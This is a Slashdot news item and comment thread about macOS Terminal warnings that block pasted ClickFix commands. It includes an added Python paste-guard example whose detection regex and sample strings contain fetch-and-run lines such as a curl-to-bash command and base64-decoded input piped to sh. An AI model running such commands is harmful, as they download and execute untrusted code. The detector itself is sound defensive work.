Desktops (Apple)

MacOS 26.4 Adds Warnings For ClickFix Attacks to Its Terminal App (macrumors.com) 66

An anonymous Slashdot reader writes: ClickFix attacks are ramping up. These attacks have users copy and paste a string to something that can execute a command line — like the Windows Run dialog, or a shell prompt.

But MacRumors reports that macOS 26.4 Tahoe (updated earlier this week) introduces a new feature to its Terminal app where it will detect ClickFix attempts and stop them by prompting the user if they really wanted to run those commands.

According to MacRumors, the warning reads "Possible malware, Paste blocked."

"Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy...."

There is also a "Paste Anyway" option if users still wish to proceed.
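The kind of check a paste guard can make before text reaches the shell, as an added example that is not part of the original story and not Apple's implementation. The heuristics, function name and sample strings are assumptions constructed for illustration.

```python
import re
import unicodedata

# Illustrative heuristics (assumptions, not Apple's rules): text that fetches
# or decodes data and hands it straight to a shell interpreter.
PIPE_TO_INTERPRETER = re.compile(
    r"\b(curl|wget)\b[^|;&\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"
    r"|\bbase64\b[^|\n]*(-d|-D|--decode)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"
)


def inspect_paste(text: str) -> list[str]:
    """Return the reasons a pasted string deserves a confirmation prompt."""
    reasons = []
    body = text.rstrip("\r\n")
    if len(body) < len(text):
        reasons.append("trailing newline: runs as soon as it is pasted")
    if "\n" in body or "\r" in body:
        reasons.append("multiple lines: more than one command")
    # Cc = control characters such as ESC, which can redraw what the user sees.
    if any(unicodedata.category(c) == "Cc" and c not in "\t\r\n" for c in text):
        reasons.append("control characters: can hide or rewrite displayed text")
    # Cf = zero-width and bidirectional format characters, invisible on screen.
    if any(unicodedata.category(c) == "Cf" for c in text):
        reasons.append("invisible or bidi format characters")
    if PIPE_TO_INTERPRETER.search(text):
        reasons.append("fetches or decodes data and feeds it to an interpreter")
    return reasons


# Constructed sample pastes (not taken from any real campaign).
SAMPLES = {
    "benign": "git status",
    "autorun": "ls -la\n",
    "pipe": "curl -s https://example.invalid/fix.sh | bash",
    "hidden": "echo hello\u202e # reversed",
    "decode": "echo Y29uc3RydWN0ZWQ= | base64 -d | sh\n",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name}: {inspect_paste(text) or 'ok'}")
```

An empty list means no prompt is needed; anything else is what a guard would show the user before offering a "paste anyway" choice.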

  • by Powercntrl ( 458442 ) on Saturday March 28, 2026 @09:47PM (#66066944) Homepage

    Back in the day, AOL attempted to address phishing scams by putting a disclaimer at the bottom of IM windows. Something along the lines of "Reminder: AOL staff will never ask for your password or billing information". Problem was, people who were foolish enough to fall for social engineering scams don't pay much attention to those sort of warnings, either.

    Seems like all the scammers will have to do is update their instructions to include "Please disregard the pop-up and click Paste Anyway".

    • by dgatwood ( 11270 )

      Reply "yes", then close and reopen this message to activate the link.

      No matter how idiot-proof you make technology, God will always create a better idiot. That's why the right way to solve this problem is:

      • Make it as hard as possible for users to accidentally do something that is irreversible, and as easy as possible to roll back even serious mistakes. This means, among other things, keeping more than just a single backup. (Apple, I'm talking about your borderline useless iCloud backups here when I say t
      • Reply "yes", then close and reopen this message to activate the link.

        No matter how idiot-proof you make technology, God will always create a better idiot. That's why the right way to solve this problem is:

        • Make it as hard as possible for users to accidentally do something that is irreversible, and as easy as possible to roll back even serious mistakes. This means, among other things, keeping more than just a single backup. (Apple, I'm talking about your borderline useless iCloud backups here when I say that.)

        You don't like Time Machine? I have hourly backups on one drive, and daily backups on a drive I store in a different location.

        I'd never use any cloud backup, that's like asking Jerry Sandusky to babysit a 10 year old boy.

        • by dgatwood ( 11270 )

          Reply "yes", then close and reopen this message to activate the link.

          No matter how idiot-proof you make technology, God will always create a better idiot. That's why the right way to solve this problem is:

          • Make it as hard as possible for users to accidentally do something that is irreversible, and as easy as possible to roll back even serious mistakes. This means, among other things, keeping more than just a single backup. (Apple, I'm talking about your borderline useless iCloud backups here when I say that.)

          You don't like Time Machine? I have hourly backups on one drive, and daily backups on a drive I store in a different location.

          I love Time Machine (except for how slow it is over SMB and how often the disk images corrupt themselves in ways that prevent future backups). Wish it existed on iOS and VisionOS.

      • by ameline ( 771895 )

        With a huge carve out for war crimes, murder, rape, child molestation, sexual assault, and official corruption. Those should live and last *forever*. Otherwise your "Epstein class" will always get away with everything.

  • I can imagine Apple later removing the "paste anyway" option and requiring you to go to Settings > Privacy to confirm the action, like how they've done with running apps downloaded off of the internet
    • by tlhIngan ( 30335 )

      I can imagine Apple later removing the "paste anyway" option and requiring you to go to Settings > Privacy to confirm the action, like how they've done with running apps downloaded off of the internet

      It's a function implemented in the shipped terminal.app. If you use a third party terminal app, it won't have the protection. Chances are if you're using a third party terminal you're probably sophisticated enough to not blindly run shell commands

    • by dub42 ( 992285 )
      I believe that you can just right click and press open. That will let you run the application without going to the settings.
  • If someone can’t type a long command into a terminal without typos, they probably should not be using a terminal for anything other than basic commands anyway.
    • by larwe ( 858929 ) on Saturday March 28, 2026 @10:56PM (#66067018)
      True but useless. For a long complex commandline input, it saves a lot of work to be able to paste it in. Not to mention the possibility that a typo might have undesirable consequences.
      • by Viol8 ( 599362 )

        Anyone who just cut and pastes a string of shell commands from some random web page or email into a terminal without checking them first frankly deserves what they get. If you're this dumb stay away from the command line.

        • by larwe ( 858929 )
          I mentioned nothing about random web pages. In our git repos, there are plenty of internal docs saying "to provision the embedded device, plug it in and run this 200-character commandline". Being able to paste those vs typing them saves a lot of time.
          • And you wouldn't check it first particularly if it had to run as root? Oooookay.

            • by larwe ( 858929 )
              Checking isn't the problem being solved. Sure I check what I run. Being able to check it on the webpage, then cut and paste it, then maybe check again that I cut and pasted correctly - is far less work, and FAR less error prone than having to type it in. Not to mention faster. If I validate it once, I can Ctrl-V multiple times rather than typing it all out again multiple times. Assume that I have sufficient sophistication to insert check steps where appropriate. Blocking me from using a simple memcpy() to d
    • If someone can’t type a long command into a terminal without typos, they probably should not be using a terminal for anything other than basic commands anyway.

      Usually, they'd be copying commands from a website or a manual, in which case the typos should not even exist

  • Can you disable all the safety features on a modern Mac and have it behave like an old school unix box? You know run su and then accidentally do something dumb? I mean we all survived those days.

    • Re: (Score:3, Informative)

      by larwe ( 858929 )
      Current versions of MacOS have something called "System Integrity Protection" which restricts certain directories from being tampered with even in a su'd shell. It can be disabled, but it's a very off-label way to run the OS and the consequences could be ... spicy.
    • Re:Question (Score:5, Funny)

      by Powercntrl ( 458442 ) on Saturday March 28, 2026 @11:19PM (#66067034) Homepage

      You know run su and then accidentally do something dumb?

      I'm pretty sure my Mac will let me run su and then send a text to my ex, but I'm not going to try it.

    • Re: (Score:3, Informative)

      by caseih ( 160668 )

      Yes you can. You have to boot into recovery mode and then change the security level. This is already something you have to do to load third-party (even signed) kexts, which are sometimes required for certain types of presumably poorly written (or not Apple-blessed) hardware drivers.

      Apparently this is even still possible on the iPhone chipped MacBook Neo.

  • Linux is insecure (Score:3, Interesting)

    by TheMiddleRoad ( 1153113 ) on Sunday March 29, 2026 @02:43AM (#66067114)
    Linux is generally insecure: https://madaidans-insecurities... [github.io] What hardening looks like: https://grapheneos.org/feature... [grapheneos.org] Not that all this makes GrapheneOS perfectly secure, but it's much better than standard Linux distros.
    • Linux has served me just fine for three decades. I got rid of my GrapheneOS phone because it constantly got in my way. My threat model does not involve being pursued by nation state actors, and I don't equate security with having doors slammed in my face all day. Security is not the most important thing in life. Vigilance will serve you much better. As Franklin said, "Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety."

      • Linux has served me just fine for three decades

        Same. But, I can honestly say the same of Windows. Though I never boarded the Mac train, I suspect that the same could be said for that.

        I think it has much more to do with the user than the overall security of the operating system.

      • GrapheneOS is giving up liberty? WTF?
    • Why do you compare GrapheneOS to a standard Linux desktop, instead of to Google Android?

      Obviously, if you take a platform that is geared towards running applications from untrusted sources and compare that to a standard Linux desktop distribution that isn't configured for that, you'll find common desktop Linux lacking.

      On the other hand, does GrapheneOS or Android have a desktop that's halfway usable?

      Historically, Linux got the reputation for being more secure because Microsoft made a number of brain-de

      • For the true paranoid, if you need to sandbox, you're doing it wrong.

        Everyone is doing it wrong, that's why we need to sandbox.

        Even if you were perfect, you wouldn't have time to do everything yourself, so you would still want sandboxing to protect you from the efforts of others.

      • The point is a well-designed, more-secure OS. That is independent of having a desktop or not. Linux runs untrusted apps all the time. Supply chain attacks are brutal, no? For the paranoid, if you're not sandboxing, you're doing it wrong.
        • I actually don't disagree in spirit, it just seems to me that we have different definitions of truly paranoid.

          A colleague of mine with a Windows Linux dual boot machine, games on one side and mail and web on the other, uses a live Linux disc to do e-banking. He's just an informed guy, I wouldn't consider him paranoid at all.

          If you're paranoid or actually in the know that "they" are after you, you have to use different machines for different purposes. I mean, one can trust sandboxes only so far, and if y

          • Interestingly, a live Linux disc can be imperfect too, if something is installed at boot from BIOS, for instance. Even then, I'd want sandboxing on my live linux boot. There is no perfect security. This is clear. Like how Anthropic's Claude just got released into the wild, all after Anthropic was supposed to be the bug squashers of the universe.
            • Agreed on the BIOS infection part. The programs could have been compiled with an infected compiler too. But I don't get why you want sandboxing on your live disc, you mean, inside, to reduce attack surface in case only non essential programs are infected, or running your live disc in a sandbox, or just out of principle?

              Because with all sandboxing, if your operating system isn't clean it's not going to save you from that attack angle. But I'm convinced you know that.

              • It's another layer of difficulty for an attack to overcome, one that doesn't usually inconvenience the user. Also, attacks installed in BIOS or the OS aren't necessarily done in some overarching god mode. AFAIK, they often install an app that then does the dirty work, and sandboxing would get in the way of that vector.
                • Good point, but would that be equally so if sandboxing were totally the norm? Then every such program would take it into account, right...? I mean, sandboxing just prevents looking sideways, if you're in the lower layers (BIOS, OS) you can look up all the way, or am I missing something?
                  • That's all security really is, though: making the attacker have to do more work.
                    • From a certain angle, exactly. Reminds me of a Dutch friend about how many bike locks are required: one more than the bikes left and right of yours...
    • From your references:

      Windows, which is leaning heavily towards Rust, a memory safe language...

      This tells me that the article is written by a Rust evangelist and nothing they say can be trusted to be unbiased. Furthermore, Windows, more accurately Microsoft, is not leaning heavily toward Rust. Microsoft uses very little Rust in Windows and has stated categorically that there is no intent to re-write Windows in Rust. Windows is mostly written in C/C++/C# with the .Net framework and there is no plan to change that.

      • You're some kind of religious zealot? You found the word "Rust" and so everything else is a lie? Microsoft uses Rust where its advantages matter. What's the big deal, snowflake?
  • The prompt is that little $_, or #, or blinking square, etc. showing you where to type. See VT100 terminals. A shell is the commands and features available by default when using that shell on your terminal. Make sure that you let the shell know what type of terminal it is running on. The command line is that space next to prompt, where you can input shell commands, pass through to system commands, or actually act interactively on a more feature-full terminal like a VT320, for example, a menu that allows

  • by PPH ( 736903 )

    These attacks have users copy and paste a string to something that can execute a command line.
    .
    . ClickFix attempts and stop them by prompting the user if they really wanted to run those commands.

    I've seen this on one of my recent Linux installs (Devuan). I get a warning before pasting into a shell prompt. That's not a problem because I know how to inspect text (tiny fonts, etc) copied from an untrusted source before running them*. Unfortunately, it also seems to interfere with the 'copy from terminal' functions. Which makes it a real annoyance.

    *I've caught a few of these. And rather than deleting them, I've tweaked some of the concealed commands to see if I can't have some real fun with the origin
